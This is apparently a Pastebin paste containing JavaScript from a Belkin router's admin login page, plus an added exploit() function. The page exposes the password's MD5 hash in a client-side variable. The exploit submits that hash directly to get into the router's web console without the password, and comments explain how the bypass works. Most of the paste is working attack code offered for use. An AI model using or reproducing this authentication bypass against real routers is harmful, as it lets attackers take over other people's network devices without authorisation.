Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- The following is the code directly from the page that the
- Belkin router serves for login for admin privleges
- */
- var password="d41d8cd98f00b204e9800998ecf8427e";
- function checkfwVersion() {
- var newwin;
- if (auto_check && (password == hex_md5(document.tF.pws.value))) {
- newwin=window.open("fwAuto.stm","Firmware","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,width=395,height=200,resizable=0");
- newwin.focus();
- }
- var curTime = new Date();
- document.tF.totalMSec.value = curTime.getTime() / 1000 - curTime.getTimezoneOffset() * 60;
- if(typeof(bEncPassword) != 'undefined') {
- document.tF.pws.maxLength = 32;
- document.tF.pws.value = hex_md5(document.tF.pws.value);
- }
- document.tF.submit();
- }
- /*
- The following is the simple function that will allow
- you to send the hashed password to the router and
- login without any issues and without having to brute
- force the MD5 hash since they've already given us
- the hashed password. document.tF doesn't exist until you
- focus the textbox by clicking on it.
- */
- function exploit() {
- document.tF.pws.maxLength = 32;
- document.tF.pws.value = password;
- document.tF.submit();
- }
- exploit();
- /*
- And that's it. Three simple lines will allow you
- to gain entry into the Belkin router web console
- without having any knowledge of the password.
- There seems to be some additional checking of the
- password firmware side but it expects the given
- value to already be MD5 hashed client side. This
- means that if you shove the very obvious password
- variable into the value of the form and call submit
- directly it sends the MD5 hash we got from the server
- and authenticates successfully. The hash in effect
- provides no additional security benefits because
- this equivocates to being sent a clear text password.
- */
Add Comment
Please, Sign In to add comment
